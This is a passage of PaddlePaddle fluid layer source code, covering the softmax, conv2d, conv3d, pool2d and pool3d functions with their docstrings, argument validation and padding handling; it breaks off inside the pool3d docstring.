[[1.0, 2.0, 3.0, 4.0],
[5.0, 6.0, 7.0, 8.0],
[6.0, 7.0, 8.0, 9.0]]]
Attrs:
axis = -1
Output:
Out.shape = [2, 3, 4]
Out.data = [[[0.0320586 , 0.08714432, 0.23688282, 0.64391426],
[0.0320586 , 0.08714432, 0.23688282, 0.64391426],
[0.07232949, 0.19661193, 0.19661193, 0.53444665]],
[[0.0320586 , 0.08714432, 0.23688282, 0.64391426],
[0.0320586 , 0.08714432, 0.23688282, 0.64391426],
[0.0320586 , 0.08714432, 0.23688282, 0.64391426]]]
Case 2:
Input:
X.shape = [2, 3, 4]
X.data = [[[2.0, 3.0, 4.0, 5.0],
[3.0, 4.0, 5.0, 6.0],
[7.0, 8.0, 8.0, 9.0]],
[[1.0, 2.0, 3.0, 4.0],
[5.0, 6.0, 7.0, 8.0],
[6.0, 7.0, 8.0, 9.0]]]
Attrs:
axis = 1
Output:
Out.shape = [2, 3, 4]
Out.data = [[[0.00657326, 0.00657326, 0.01714783, 0.01714783],
[0.01786798, 0.01786798, 0.04661262, 0.04661262],
[0.97555875, 0.97555875, 0.93623955, 0.93623955]],
[[0.00490169, 0.00490169, 0.00490169, 0.00490169],
[0.26762315, 0.26762315, 0.26762315, 0.26762315],
[0.72747516, 0.72747516, 0.72747516, 0.72747516]]]
Args:
input (Variable): The input variable. A multi-dimension ``Tensor`` with type float32 or float64.
use_cudnn (bool, optional): Use cudnn kernel or not, it is valid only when the cudnn \
library is installed. To improve numerical stability, set use_cudnn to \
False by default.
name (str, optional): The default value is None. Normally there is no need for user to set this property. For more information, please refer to :ref:`api_guide_Name` . Default: None.
will be named automatically. Default: None.
axis (int, optional): The index of dimension to perform softmax calculations, it should
be in range :math:`[-1, rank - 1]`, while :math:`rank` is the rank of
input variable. Default: -1. -1 means the last dimension.
Returns:
Variable: ``Tensor`` indicates the output of softmax. The data type and shape are the same as ``input`` .
Examples:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
data = fluid.data(name="input", shape=[-1, 3],dtype="float32")
result = fluid.layers.softmax(data,axis=1)
place = fluid.CPUPlace()
exe = fluid.Executor(place)
exe.run(fluid.default_startup_program())
x = np.random.rand(3, 3).astype("float32")
output= exe.run(feed={"input": x},
fetch_list=[result[0]])
print(output)
"""
if in_dygraph_mode():
return core.ops.softmax(input, 'axis', axis, 'use_cudnn', use_cudnn)
inputs = {"X": [input]}
attrs = {"axis": axis, "use_cudnn": use_cudnn}
helper = LayerHelper('softmax', **locals())
check_variable_and_dtype(input, 'input', ['float16', 'float32', 'float64'],
'softmax')
dtype = helper.input_dtype()
softmax_out = helper.create_variable_for_type_inference(dtype)
helper.append_op(
type="softmax",
inputs={"X": input},
outputs={"Out": softmax_out},
attrs=attrs)
return softmax_out
def conv2d(input,
num_filters,
filter_size,
stride=1,
padding=0,
dilation=1,
groups=None,
param_attr=None,
bias_attr=None,
use_cudnn=True,
act=None,
name=None,
data_format="NCHW"):
"""
The convolution2D layer calculates the output based on the input, filter
and strides, paddings, dilations, groups parameters. Input and
Output are in NCHW or NHWC format, where N is batch size, C is the number of
channels, H is the height of the feature, and W is the width of the feature.
Filter is in MCHW format, where M is the number of output image channels,
C is the number of input image channels, H is the height of the filter,
and W is the width of the filter. If the groups is greater than 1,
C will equal the number of input image channels divided by the groups.
Please refer to UFLDL's `convolution
<http://ufldl.stanford.edu/tutorial/supervised/FeatureExtractionUsingConvolution/>`_
for more details.
If bias attribution and activation type are provided, bias is added to the
output of the convolution, and the corresponding activation function is
applied to the final result.
For each input :math:`X`, the equation is:
.. math::
Out = \sigma (W \\ast X + b)
Where:
* :math:`X`: Input value, a tensor with NCHW or NHWC format.
* :math:`W`: Filter value, a tensor with MCHW format.
* :math:`\\ast`: Convolution operation.
* :math:`b`: Bias value, a 2-D tensor with shape [M, 1].
* :math:`\\sigma`: Activation function.
* :math:`Out`: Output value, the shape of :math:`Out` and :math:`X` may be different.
Example:
- Input:
Input shape: :math:`(N, C_{in}, H_{in}, W_{in})`
Filter shape: :math:`(C_{out}, C_{in}, H_f, W_f)`
- Output:
Output shape: :math:`(N, C_{out}, H_{out}, W_{out})`
Where
.. math::
H_{out}&= \\frac{(H_{in} + 2 * paddings[0] - (dilations[0] * (H_f - 1) + 1))}{strides[0]} + 1 \\\\
W_{out}&= \\frac{(W_{in} + 2 * paddings[1] - (dilations[1] * (W_f - 1) + 1))}{strides[1]} + 1
Args:
input (Variable): The input is 4-D Tensor with shape [N, C, H, W], the data type
of input is float16 or float32 or float64.
num_filters(int): The number of filter. It is as same as the output
image channel.
filter_size (int|tuple): The filter size. If filter_size
is a tuple, it must contain two integers, (filter_size_height,
filter_size_width). Otherwise, filter_size_height = filter_size_width =\
filter_size.
stride (int|tuple): The stride size. It means the stride in convolution.
If stride is a tuple, it must contain two integers, (stride_height, stride_width).
Otherwise, stride_height = stride_width = stride. Default: stride = 1.
padding (string|int|list|tuple): The padding size. It means the number of zero-paddings
on both sides for each dimension.If `padding` is a string, either 'VALID' or
'SAME' which is the padding algorithm. If padding size is a tuple or list,
it could be in three forms: `[pad_height, pad_width]` or
`[pad_height_top, pad_height_bottom, pad_width_left, pad_width_right]`, and when
`data_format` is `"NCHW"`, `padding` can be in the form `[[0,0], [0,0],
[pad_height_top, pad_height_bottom], [pad_width_left, pad_width_right]]`.
when `data_format` is `"NHWC"`, `pool_padding` can be in the form
`[[0,0], [pad_height_top, pad_height_bottom], [pad_width_left, pad_width_right], [0,0]]`.
Default: padding = 0.
dilation (int|tuple): The dilation size. It means the spacing between the kernel
points. If dilation is a tuple, it must contain two integers, (dilation_height,
dilation_width). Otherwise, dilation_height = dilation_width = dilation.
Default: dilation = 1.
groups (int): The groups number of the Conv2d Layer. According to grouped
convolution in Alex Krizhevsky's Deep CNN paper: when group=2,
the first half of the filters is only connected to the first half
of the input channels, while the second half of the filters is only
connected to the second half of the input channels. Default: groups=1.
param_attr (ParamAttr|None): The parameter attribute for learnable parameters/weights
of conv2d. If it is set to None or one attribute of ParamAttr, conv2d
will create ParamAttr as param_attr. If the Initializer of the param_attr
is not set, the parameter is initialized with :math:`Normal(0.0, std)`,
and the :math:`std` is :math:`(\\frac{2.0 }{filter\_elem\_num})^{0.5}`. Default: None.
bias_attr (ParamAttr|bool|None): The parameter attribute for the bias of conv2d.
If it is set to False, no bias will be added to the output units.
If it is set to None or one attribute of ParamAttr, conv2d
will create ParamAttr as bias_attr. If the Initializer of the bias_attr
is not set, the bias is initialized zero. Default: None.
use_cudnn (bool): Use cudnn kernel or not, it is valid only when the cudnn
library is installed. Default: True
act (str): Activation type, if it is set to None, activation is not appended.
Default: None
name(str|None): For detailed information, please refer
to :ref:`api_guide_Name`. Usually name is no need to set and
None by default.
data_format (str, optional): Specify the data format of the input, and the data format of the output
will be consistent with that of the input. An optional string from: `"NCHW"`, `"NHWC"`.
The default is `"NCHW"`. When it is `"NCHW"`, the data is stored in the order of:
`[batch_size, input_channels, input_height, input_width]`.
Returns:
A Variable holding Tensor representing the conv2d, whose data type is the
same with input. If act is None, the tensor variable storing the convolution
result, and if act is not None, the tensor variable storing convolution
and non-linearity activation result.
Raises:
ValueError: If the type of `use_cudnn` is not bool.
ValueError: If `data_format` is not "NCHW" or "NHWC".
ValueError: If the channel dimmention of the input is less than or equal to zero.
ValueError: If `padding` is a string, but not "SAME" or "VALID".
ValueError: If `padding` is a tuple, but the element corresponding to the input's batch size is not 0
or the element corresponding to the input's channel is not 0.
ShapeError: If the input is not 4-D Tensor.
ShapeError: If the input's dimension size and filter's dimension size not equal.
ShapeError: If the dimension size of input minus the size of `stride` is not 2.
ShapeError: If the number of input channels is not equal to filter's channels * groups.
ShapeError: If the number of output channels is not be divided by groups.
Examples:
.. code-block:: python
import paddle.fluid as fluid
data = fluid.data(name='data', shape=[None, 3, 32, 32], dtype='float32')
conv2d = fluid.layers.conv2d(input=data, num_filters=2, filter_size=3, act="relu")
"""
check_variable_and_dtype(input, 'input', ['float16', 'float32', 'float64'],
'conv2d')
num_channels = input.shape[1]
if not isinstance(use_cudnn, bool):
raise ValueError("Attr(use_cudnn) should be True or False. Received "
"Attr(use_cudnn): %s. " % str(use_cudnn))
if data_format not in ["NCHW", "NHWC"]:
raise ValueError(
"Attr(data_format) should be 'NCHW' or 'NHWC'. Received "
"Attr(data_format): %s." % str(data_format))
channel_last = (data_format == "NHWC")
num_channels = input.shape[3] if channel_last else input.shape[1]
if num_channels < 0:
raise ValueError(
"The channel dimmention of the input(%s) should be defined. "
"Received: %s." % (str(input.shape), str(num_channels)))
assert param_attr is not False, "param_attr should not be False here."
l_type = 'conv2d'
if (num_channels == groups and num_filters % num_channels == 0 and
not use_cudnn):
l_type = 'depthwise_conv2d'
helper = LayerHelper(l_type, **locals())
dtype = helper.input_dtype()
if groups is None:
num_filter_channels = num_channels
else:
if num_channels % groups != 0:
raise ValueError(
"the channel of input must be divisible by groups,"
"received: the channel of input is {}, the shape of input is {}"
", the groups is {}".format(num_channels, input.shape, groups))
num_filter_channels = num_channels // groups
filter_size = utils.convert_to_list(filter_size, 2, 'filter_size')
stride = utils.convert_to_list(stride, 2, 'stride')
dilation = utils.convert_to_list(dilation, 2, 'dilation')
# padding
def _update_padding(padding, data_format):
def is_list_or_tuple(ele):
if isinstance(ele, list) or isinstance(ele, tuple):
return True
return False
if is_list_or_tuple(padding) and len(padding) == 4:
if is_list_or_tuple(padding[0]) and (data_format == "NCHW"):
if not (padding[0] == [0, 0] and padding[1] == [0, 0]):
raise ValueError(
"Non-zero padding(%s) in the batch or channel dimensions "
"is not supported." % str(padding))
padding = padding[2:4]
padding = [ele for a_list in padding for ele in a_list]
elif is_list_or_tuple(padding[0]) and (data_format == "NHWC"):
if not (padding[0] == [0, 0] and padding[3] == [0, 0]):
raise ValueError(
"Non-zero padding(%s) in the batch or channel dimensions "
"is not supported." % str(padding))
padding = padding[1:3]
padding = [ele for a_list in padding for ele in a_list]
padding = utils.convert_to_list(padding, 4, 'padding')
if utils._is_symmetric_padding(padding, 2):
padding = [padding[0], padding[2]]
else:
padding = utils.convert_to_list(padding, 2, 'padding')
return padding
padding_algorithm = "EXPLICIT"
if isinstance(padding, str):
padding = padding.upper()
if padding not in ["SAME", "VALID"]:
raise ValueError(
"Unknown padding: '%s'. It can only be 'SAME' or 'VALID'." %
str(padding))
if padding == "VALID":
padding_algorithm = "VALID"
padding = [0, 0]
elif padding == "SAME":
padding_algorithm = "SAME"
padding = [0, 0]
padding = _update_padding(padding, data_format)
filter_shape = [num_filters, int(num_filter_channels)] + filter_size
def _get_default_param_initializer():
filter_elem_num = filter_size[0] * filter_size[1] * num_channels
std = (2.0 / filter_elem_num)**0.5
return Normal(0.0, std, 0)
filter_param = helper.create_parameter(
attr=helper.param_attr,
shape=filter_shape,
dtype=dtype,
default_initializer=_get_default_param_initializer())
pre_bias = helper.create_variable_for_type_inference(dtype)
helper.append_op(
type=l_type,
inputs={
'Input': input,
'Filter': filter_param,
},
outputs={"Output": pre_bias},
attrs={
'strides': stride,
'paddings': padding,
'dilations': dilation,
'groups': groups,
'use_cudnn': use_cudnn,
'use_mkldnn': False,
'fuse_relu_before_depthwise_conv': False,
"padding_algorithm": padding_algorithm,
"data_format": data_format,
})
if data_format == 'NCHW':
pre_act = helper.append_bias_op(pre_bias, dim_start=1, dim_end=2)
else:
pre_act = helper.append_bias_op(pre_bias, dim_start=3, dim_end=4)
return helper.append_activation(pre_act)
def conv3d(input,
num_filters,
filter_size,
stride=1,
padding=0,
dilation=1,
groups=None,
param_attr=None,
bias_attr=None,
use_cudnn=True,
act=None,
name=None,
data_format="NCDHW"):
"""
The convolution3D layer calculates the output based on the input, filter
and strides, paddings, dilations, groups parameters. Input(Input) and
Output(Output) are in NCDHW or NDHWC format. Where N is batch size C is the number of
channels, D is the depth of the feature, H is the height of the feature,
and W is the width of the feature. Convlution3D is similar with Convlution2D
but adds one dimension(depth). If bias attribution and activation type are
provided, bias is added to the output of the convolution, and the
corresponding activation function is applied to the final result.
For each input :math:`X`, the equation is:
.. math::
Out = \sigma (W \\ast X + b)
In the above equation:
* :math:`X`: Input value, a tensor with NCDHW or NDHWC format.
* :math:`W`: Filter value, a tensor with MCDHW format.
* :math:`\\ast`: Convolution operation.
* :math:`b`: Bias value, a 2-D tensor with shape [M, 1].
* :math:`\\sigma`: Activation function.
* :math:`Out`: Output value, the shape of :math:`Out` and :math:`X` may be different.
Example:
- Input:
Input shape: :math:`(N, C_{in}, D_{in}, H_{in}, W_{in})`
Filter shape: :math:`(C_{out}, C_{in}, D_f, H_f, W_f)`
- Output:
Output shape: :math:`(N, C_{out}, D_{out}, H_{out}, W_{out})`
Where
.. math::
D_{out}&= \\frac{(D_{in} + 2 * paddings[0] - (dilations[0] * (D_f - 1) + 1))}{strides[0]} + 1 \\\\
H_{out}&= \\frac{(H_{in} + 2 * paddings[1] - (dilations[1] * (H_f - 1) + 1))}{strides[1]} + 1 \\\\
W_{out}&= \\frac{(W_{in} + 2 * paddings[2] - (dilations[2] * (W_f - 1) + 1))}{strides[2]} + 1
Args:
input (Variable): The input is 5-D Tensor with shape [N, C, D, H, W], the data
type of input is float16 or float32 or float64.
num_filters(int): The number of filter. It is as same as the output
image channel.
filter_size (int|tuple): The filter size. If filter_size is a tuple,
it must contain three integers, (filter_size_depth, filter_size_height,
filter_size_width). Otherwise, filter_size_depth = filter_size_height = \
filter_size_width = filter_size.
stride (int|tuple): The stride size. It means the stride in convolution. If stride is a
tuple, it must contain three integers, (stride_depth, stride_height, stride_width).
Otherwise, stride_depth = stride_height = stride_width = stride. Default: stride = 1.
padding (string|int|list|tuple): The padding size. It means the number of zero-paddings
on both sides for each dimension. If `padding` is a string, either 'VALID' or
'SAME' which is the padding algorithm. If padding size is a tuple or list,
it could be in three forms: `[pad_depth, pad_height, pad_width]` or
`[pad_depth_front, pad_depth_back, pad_height_top, pad_height_bottom, pad_width_left, pad_width_right]`,
and when `data_format` is `"NCDHW"`, `pool_padding` can be in the form
`[[0,0], [0,0], [pad_depth_front, pad_depth_back], [pad_height_top, pad_height_bottom], [pad_width_left, pad_width_right]]`.
when `data_format` is `"NDHWC"`, `pool_padding` can be in the form
`[[0,0], [pad_depth_front, pad_depth_back], [pad_height_top, pad_height_bottom], [pad_width_left, pad_width_right], [0,0]]`.
Default: padding = 0.
dilation (int|tuple): The dilation size. It means the spacing between the kernel points.
If dilation is a tuple, it must contain three integers, (dilation_depth, dilation_height,
dilation_width). Otherwise, dilation_depth = dilation_height = dilation_width = dilation.
Default: dilation = 1.
groups (int): The groups number of the Conv3d Layer. According to grouped
convolution in Alex Krizhevsky's Deep CNN paper: when group=2,
the first half of the filters is only connected to the first half
of the input channels, while the second half of the filters is only
connected to the second half of the input channels. Default: groups=1
param_attr (ParamAttr|None): The parameter attribute for learnable parameters/weights
of conv3d. If it is set to None or one attribute of ParamAttr, conv3d
will create ParamAttr as param_attr. If it is set to None, the parameter
is initialized with :math:`Normal(0.0, std)`, and the :math:`std` is
:math:`(\\frac{2.0 }{filter\_elem\_num})^{0.5}`. Default: None.
bias_attr (ParamAttr|bool|None): The parameter attribute for the bias of conv3d.
If it is set to False, no bias will be added to the output units.
If it is set to None or one attribute of ParamAttr, conv3d
will create ParamAttr as bias_attr. If the Initializer of the bias_attr
is not set, the bias is initialized zero. Default: None.
use_cudnn (bool): Use cudnn kernel or not, it is valid only when the cudnn
library is installed. Default: True
act (str): Activation type, if it is set to None, activation is not appended.
Default: None.
name(str|None): For detailed information, please refer
to :ref:`api_guide_Name`. Usually name is no need to set and
None by default.
data_format (str, optional): Specify the data format of the input, and the data format of the output
will be consistent with that of the input. An optional string from: `"NCHW"`, `"NHWC"`.
The default is `"NCHW"`. When it is `"NCHW"`, the data is stored in the order of:
`[batch_size, input_channels, input_height, input_width]`.
Returns:
A Variable holding Tensor representing the conv3d, whose data type is
the same with input. If act is None, the tensor variable storing the
convolution result, and if act is not None, the tensor variable storing
convolution and non-linearity activation result.
Raises:
ValueError: If the type of `use_cudnn` is not bool.
ValueError: If `data_format` is not "NCDHW" or "NDHWC".
ValueError: If the channel dimmention of the input is less than or equal to zero.
ValueError: If `padding` is a string, but not "SAME" or "VALID".
ValueError: If `padding` is a tuple, but the element corresponding to the input's batch size is not 0
or the element corresponding to the input's channel is not 0.
ShapeError: If the input is not 5-D Tensor.
ShapeError: If the input's dimension size and filter's dimension size not equal.
ShapeError: If the dimension size of input minus the size of `stride` is not 2.
ShapeError: If the number of input channels is not equal to filter's channels * groups.
ShapeError: If the number of output channels is not be divided by groups.
Examples:
.. code-block:: python
import paddle.fluid as fluid
data = fluid.data(name='data', shape=[None, 3, 12, 32, 32], dtype='float32')
conv3d = fluid.layers.conv3d(input=data, num_filters=2, filter_size=3, act="relu")
"""
l_type = 'conv3d'
assert param_attr is not False, "param_attr should not be False here."
helper = LayerHelper(l_type, **locals())
dtype = helper.input_dtype()
if not isinstance(use_cudnn, bool):
raise ValueError("Attr(use_cudnn) should be True or False. Received "
"Attr(use_cudnn): %s. " % str(use_cudnn))
if data_format not in ["NCDHW", "NDHWC"]:
raise ValueError(
"Attr(data_format) should be 'NCDHW' or 'NDHWC'. Received "
"Attr(data_format): %s." % str(data_format))
channel_last = (data_format == "NDHWC")
num_channels = input.shape[4] if channel_last else input.shape[1]
if num_channels < 0:
raise ValueError(
"The channel dimmention of the input(%s) should be defined. "
"Received: %s." % (str(input.shape), str(num_channels)))
if groups is None:
num_filter_channels = num_channels
else:
if num_channels % groups != 0:
raise ValueError(
"The number of input channels must be divisible by Attr(groups). "
"Received: number of channels(%s), groups(%s)." %
(str(num_channels), str(groups)))
num_filter_channels = num_channels // groups
filter_size = utils.convert_to_list(filter_size, 3, 'filter_size')
stride = utils.convert_to_list(stride, 3, 'stride')
dilation = utils.convert_to_list(dilation, 3, 'dilation')
def _update_padding(padding, data_format):
def is_list_or_tuple(ele):
if isinstance(ele, list) or isinstance(ele, tuple):
return True
return False
if is_list_or_tuple(padding) and len(padding) == 5:
if is_list_or_tuple(padding[0]) and (data_format == "NCDHW"):
if not (padding[0] == [0, 0] and padding[1] == [0, 0]):
raise ValueError(
"Non-zero padding(%s) in the batch or channel dimensions "
"is not supported." % str(padding))
padding = padding[2:5]
padding = [ele for a_list in padding for ele in a_list]
elif is_list_or_tuple(padding[0]) and (data_format == "NDHWC"):
if not (padding[0] == [0, 0] and padding[4] == [0, 0]):
raise ValueError(
"Non-zero padding(%s) in the batch or channel dimensions "
"is not supported." % str(padding))
padding = padding[1:4]
padding = [ele for a_list in padding for ele in a_list]
padding = utils.convert_to_list(padding, 6, 'padding')
if utils._is_symmetric_padding(padding, 3):
padding = [padding[0], padding[2], padding[4]]
elif is_list_or_tuple(padding) and len(padding) == 6:
padding = utils.convert_to_list(padding, 6, 'padding')
if utils._is_symmetric_padding(padding, 3):
padding = [padding[0], padding[2], padding[4]]
else:
padding = utils.convert_to_list(padding, 3, 'padding')
return padding
padding_algorithm = "EXPLICIT"
if isinstance(padding, str):
padding = padding.upper()
if padding not in ["SAME", "VALID"]:
raise ValueError(
"Unknown padding: '%s'. It can only be 'SAME' or 'VALID'." %
str(padding))
if padding == "VALID":
padding_algorithm = "VALID"
padding = [0, 0, 0]
elif padding == "SAME":
padding_algorithm = "SAME"
padding = [0, 0, 0]
padding = _update_padding(padding, data_format)
input_shape = input.shape
filter_shape = [num_filters, num_filter_channels] + filter_size
def _get_default_param_initializer():
filter_elem_num = filter_size[0] * filter_size[1] * filter_size[
2] * num_channels
std = (2.0 / filter_elem_num)**0.5
return Normal(0.0, std, 0)
filter_param = helper.create_parameter(
attr=helper.param_attr,
shape=filter_shape,
dtype=dtype,
default_initializer=_get_default_param_initializer())
pre_bias = helper.create_variable_for_type_inference(dtype)
helper.append_op(
type=l_type,
inputs={
'Input': input,
'Filter': filter_param,
},
outputs={"Output": pre_bias},
attrs={
'strides': stride,
'paddings': padding,
'dilations': dilation,
'groups': groups,
'use_cudnn': use_cudnn,
'use_mkldnn': False,
"padding_algorithm": padding_algorithm,
"data_format": data_format,
})
if data_format == 'NCDHW':
pre_act = helper.append_bias_op(pre_bias, dim_start=1, dim_end=2)
else:
pre_act = helper.append_bias_op(pre_bias, dim_start=4, dim_end=5)
return helper.append_activation(pre_act)
@templatedoc()
def pool2d(input,
pool_size=-1,
pool_type="max",
pool_stride=1,
pool_padding=0,
global_pooling=False,
use_cudnn=True,
ceil_mode=False,
name=None,
exclusive=True,
data_format="NCHW"):
"""
${comment}
Args:
input (Variable): The input tensor of pooling operator which is a 4-D tensor with
shape [N, C, H, W]. The format of input tensor is `"NCHW"` or
`"NHWC"`, where `N` is batch size, `C` is the number of channels,
`H` is the height of the feature, and `W` is the width of the
feature. The data type if float32 or float64.
pool_size (int|list|tuple): The pool kernel size. If pool kernel size is a tuple or list,
it must contain two integers, (pool_size_Height, pool_size_Width).
Otherwise, the pool kernel size will be a square of an int.
pool_type: ${pooling_type_comment}
pool_stride (int|list|tuple): The pool stride size. If pool stride size is a tuple or list,
it must contain two integers, (pool_stride_Height, pool_stride_Width).
Otherwise, the pool stride size will be a square of an int.
pool_padding (string|int|list|tuple): The pool padding. If `pool_padding` is a string, either 'VALID' or
'SAME' which is the padding algorithm. If pool padding size is a tuple or list,
it could be in three forms: `[pad_height, pad_width]` or
`[pad_height_top, pad_height_bottom, pad_width_left, pad_width_right]`, and when `data_format` is `"NCHW"`,
`pool_padding` can be in the form `[[0,0], [0,0], [pad_height_top, pad_height_bottom], [pad_width_left, pad_width_right]]`.
when `data_format` is `"NHWC"`, `pool_padding` can be in the form
`[[0,0], [pad_height_top, pad_height_bottom], [pad_width_left, pad_width_right], [0,0]]`.
Otherwise, the pool padding size will be a square of an int.
global_pooling (bool): ${global_pooling_comment}
use_cudnn (bool): ${use_cudnn_comment}
ceil_mode (bool): ${ceil_mode_comment}
name(str, optional): For detailed information, please refer
to :ref:`api_guide_Name`. Usually name is no need to set and
None by default.
exclusive (bool): Whether to exclude padding points in average pooling
mode, default is `true`.
data_format (string): The data format of the input and output data. An optional string from: `"NCHW"`, `"NDHW"`.
The default is `"NCHW"`. When it is `"NCHW"`, the data is stored in the order of:
`[batch_size, input_channels, input_height, input_width]`.
Returns:
Variable: The output tensor of pooling result. The data type is same as input tensor.
Raises:
ValueError: If `pool_type` is not "max" nor "avg".
ValueError: If `global_pooling` is False and `pool_size` is -1.
TypeError: If `use_cudnn` is not a bool value.
ValueError: If `data_format` is not "NCHW" or "NHWC".
ValueError: If `pool_padding` is a string, but not "SAME" or "VALID".
ValueError: If `pool_padding` is "VALID", but `ceil_mode` is True.
ValueError: If `pool_padding` is a list or tuple, but the elements in the batch or channel dimensions are non-zero.
ShapeError: If the input is not a 4-D or 5-D Tensor.
ShapeError: If the dimension of input minus the size of `pool_stride` is not 2.
ShapeError: If the size of `pool_size` and `pool_stride` is not equal.
ShapeError: If the output's shape calculated is not greater than 0.
Examples:
.. code-block:: python
import paddle.fluid as fluid
data = fluid.data(name='data', shape=[None, 3, 32, 32], dtype='float32')
# max pool2d
pool2d = fluid.layers.pool2d(
input = data,
pool_size = 2,
pool_type = "max",
pool_stride = 1,
global_pooling=False)
# average pool2d
pool2d = fluid.layers.pool2d(
input = data,
pool_size = 2,
pool_type = "avg",
pool_stride = 1,
global_pooling=False)
# global average pool2d
pool2d = fluid.layers.pool2d(
input = data,
pool_size = 2,
pool_type = "avg",
pool_stride = 1,
global_pooling=True)
# Attr(pool_padding) is a list with 4 elements, Attr(data_format) is "NCHW".
out_1 = fluid.layers.pool2d(
input = data,
pool_size = 3,
pool_type = "avg",
pool_stride = 1,
pool_padding = [1, 2, 1, 0],
data_format = "NCHW")
# Attr(pool_padding) is a string, Attr(data_format) is "NCHW".
out_2 = fluid.layers.pool2d(
input = data,
pool_size = 3,
pool_type = "avg",
pool_stride = 1,
pool_padding = "VALID",
data_format = "NCHW")
"""
if pool_type not in ["max", "avg"]:
raise ValueError(
"Unknown Attr(pool_type): '%s'. It can only be 'max' or 'avg'.",
str(pool_type))
if global_pooling is False and pool_size == -1:
raise ValueError(
"When Attr(global_pooling) is False, Attr(pool_size) must be passed "
"and be a valid value. Received pool_size: %s." % str(pool_size))
if not isinstance(use_cudnn, bool):
raise TypeError("Attr(use_cudnn) should be True or False. Received "
"Attr(use_cudnn): %s." % str(use_cudnn))
if data_format not in ["NCHW", "NHWC"]:
raise ValueError(
"Attr(data_format) should be 'NCHW' or 'NHWC'. Received "
"Attr(data_format): %s." % str(data_format))
pool_size = utils.convert_to_list(pool_size, 2, 'pool_size')
pool_stride = utils.convert_to_list(pool_stride, 2, 'pool_stride')
def update_padding(padding, data_format):
def is_list_or_tuple(ele):
if isinstance(ele, list) or isinstance(ele, tuple):
return True
return False
if is_list_or_tuple(padding) and len(padding) == 4:
if is_list_or_tuple(padding[0]) and (data_format == "NCHW"):
if not (padding[0] == [0, 0] and padding[1] == [0, 0]):
raise ValueError(
"Non-zero pool_padding(%s) in the batch or channel dimensions "
"is not supported." % str(padding))
padding = padding[2:4]
padding = [ele for a_list in padding for ele in a_list]
elif is_list_or_tuple(padding[0]) and (data_format == "NHWC"):
if not (padding[0] == [0, 0] and padding[3] == [0, 0]):
raise ValueError(
"Non-zero pool_padding(%s) in the batch or channel dimensions "
"is not supported." % str(padding))
padding = padding[1:3]
padding = [ele for a_list in padding for ele in a_list]
padding = utils.convert_to_list(padding, 4, 'padding')
if utils._is_symmetric_padding(padding, 2):
padding = [padding[0], padding[2]]
else:
padding = utils.convert_to_list(padding, 2, 'padding')
return padding
padding_algorithm = "EXPLICIT"
if isinstance(pool_padding, str):
pool_padding = pool_padding.upper()
if pool_padding not in ["SAME", "VALID"]:
raise ValueError(
"Unknown Attr(pool_padding): '%s'. It can only be 'SAME' or 'VALID'."
% str(pool_padding))
if pool_padding == "VALID":
padding_algorithm = "VALID"
pool_padding = [0, 0]
if ceil_mode != False:
raise ValueError(
"When Attr(pool_padding) is \"VALID\", Attr(ceil_mode) must be False. "
"Received ceil_mode: True.")
elif pool_padding == "SAME":
padding_algorithm = "SAME"
pool_padding = [0, 0]
pool_padding = update_padding(pool_padding, data_format)
op_type = 'pool2d'
helper = LayerHelper(op_type, **locals())
dtype = helper.input_dtype()
pool_out = helper.create_variable_for_type_inference(dtype)
helper.append_op(
type=op_type,
inputs={"X": input},
outputs={"Out": pool_out},
attrs={
"pooling_type": pool_type,
"ksize": pool_size,
"global_pooling": global_pooling,
"strides": pool_stride,
"paddings": pool_padding,
"padding_algorithm": padding_algorithm,
"use_cudnn": use_cudnn,
"ceil_mode": ceil_mode,
"use_mkldnn": False,
"exclusive": exclusive,
"data_format": data_format,
})
return pool_out
@templatedoc()
def pool3d(input,
pool_size=-1,
pool_type="max",
pool_stride=1,
pool_padding=0,
global_pooling=False,
use_cudnn=True,
ceil_mode=False,
name=None,
exclusive=True,
data_format="NCDHW"):
"""
${comment}
Args:
input (Variable): The input tensor of pooling operator, which is a 5-D tensor with
shape [N, C, D, H, W]. The format of
input tensor is `"NCDHW"` or `"NDHWC"`, where `N` is batch size, `C` is
the number of channels, `D` is the depth of the feature,
`H` is the height of the feature, and `W` is the width
of the feature.
pool_size (int|list|tuple): The pool kernel size. If pool kernel size
is a tuple or list, it must contain three integers,
(pool_size_Depth, pool_size_Height, pool_size_Width).
Otherwise, the pool kernel size will be the cube of an int.
pool_type (string): ${pooling_type_comment}
pool_stride (string|int|list|tuple)): The pool padding. If `pool_padding` is a string, either 'VALID' or
'SAME' which is the padding algorithm. If pool stride size is a tuple or list,
it must contain three integers, `[stride_Depth, stride_Height, stride_Width]`.
Otherwise, the pool stride size will be a cube of an int.
pool_padding (int|list|tuple): The pool padding size. If pool padding size is a tuple or list,
it could be in three forms: `[pad_depth, pad_height, pad_width]` or
`[pad_depth_front, pad_depth_back, pad_height_top, pad_height_bottom, pad_width_left, pad_width_right]`,
and when `data_format` is `"NCDHW"`, `pool_padding` can be in the form
`[[0,0], [0,0], [pad_depth_front, pad_depth_back], [pad_height_top, pad_height_bottom], [pad_width_left, pad_width_right]]`.
when `data_format` is `"NDHWC"`, `pool_padding` can be in the form
`[[0,0], [pad_depth_front, pad_depth_back], [pad_height_top, pad_height_bottom], [pad_width_left, pad_width_right], [0,0]]`.
global_pooling (bool): ${global_pooling_comment}
use_cudnn (bool): ${use_cudnn_comment}
ceil_mode (bool): ${ceil_mode_comment}
name(str, optional): For detailed information, please refer
to :ref:`api_guide_Name`. Usually name is no need to set and
None by default.
exclusive (bool): Whether to exclude padding points in average pooling
mode, default is true.
data_format (string): The data format of the input and output data. An optional string from: `"NCDHW"`, `"NDHWC"`.
The default is `"NCDHW"`. When it is `"NCDHW"`, the data is stored in the order of:
`[batch_size, input_channels, input_depth, input_height, input_width]`.
Returns:
Variable: The output tensor of pooling result. The data type is same as input tensor.
Raises:
ValueError: If `pool_type` is not "max" nor "avg".
ValueError: If `global_pooling` is False and `pool_size` is -1.
TypeError: If `use_cudnn` is not a bool value.
ValueError: If `data_format` is not "NCDHW" or "NDHWC".
ValueError: If `pool_padding` is a string, but not "SAME" or "VALID".
ValueError: If `pool_padding` is "VALID", but `ceil_mode` is True.
ValueError: If `pool_padding` is a list or tuple, but the elements in the batch or channel dimensions are non-zero.
ShapeError: If the input is not a 4-D or 5-D Tensor.
ShapeError: If the dimension of input minus the size of `pool_stride` is not 2.
ShapeError: If the size of `pool_size` and `pool_stride` is not equal.
ShapeError: If the output's shape calculated is not greater than 0.
Examples:
.. code-block:: python
import paddle.fluid as fluid
data = fluid.data(name='data', shape=[None, 3, 32, 32, 32], dtype='float32')
# max pool3d
pool3d = fluid.layers.pool3d(
input = data,
pool_size = 2,
pool_type = "max",
